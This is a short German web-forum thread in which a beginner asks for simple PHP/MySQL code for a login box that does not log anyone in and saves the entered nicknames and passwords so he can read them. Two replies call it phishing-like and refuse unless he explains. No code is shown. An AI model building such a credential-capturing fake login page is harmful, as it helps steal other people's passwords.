Einloggen bei meiner Site

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Einloggen bei meiner Site

      Hi,

      ich bin noch totaler Anfänger(html hab ich ein wenig drauf^.^) und würde gern ein einlogg fenster erstellen.

      Also, man gibt sein Nickname und sein Passwort ein und muss dann auf Login klicken. Dann wird man auf eine andere Seite weitergeleitet. Es soll ganz simpel sein. Ohne Anmeldung. Einfach nur Nick und Pw und dann login und die Weiterleitung auf eine andere Seite.

      Das wichtigste ist, dass ich die Daten sehe, mit denen sich die User einloggen(wird dann auf der Datenbank gespeichert, hab ich von nem freund erfahren).

      Was ich hab:

      -PHP5
      -FTP
      -MySQL

      Ich hoff ihr könnt mir einen einfachen Code sagen.

      Danke

      edit: die user müssen danach nicht eingeloggt sein!

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von The_VictoR ()

    • hört sich grad so an als wolltest du was fishing-mäßiges machen?
      bitte erkläre was du genau mit den daten willst (also warum diese für dich auslesbar sein sollen und die person danach nicht angemeldet sein muss).

      möchte nämlich keine unseriösen sachen unterstützen, falls du sowas vor hast solltest du deine beiträge leeren und einen mod bitten den thread zu löschen.

      lg
      Empty your mind.
      Be formless shapeless like water.
      Now you put water into a cup, it becomes the cup.
      You put water into a bottle, it becomes the bottle.
      You put it into a teapot, it becomes the teapot.
      Water can crash, or it can flow!

      Be like water, my friend.
    • wenn du ein quiz willst bei welchem leute etwas eingeben müssen um weiter zu kommen brauchst du dazu nicht die daten in ner sql-tabelle zu speichern.
      sorry aber das hört sich alles sehr suspekt an was du hier von dir gibst.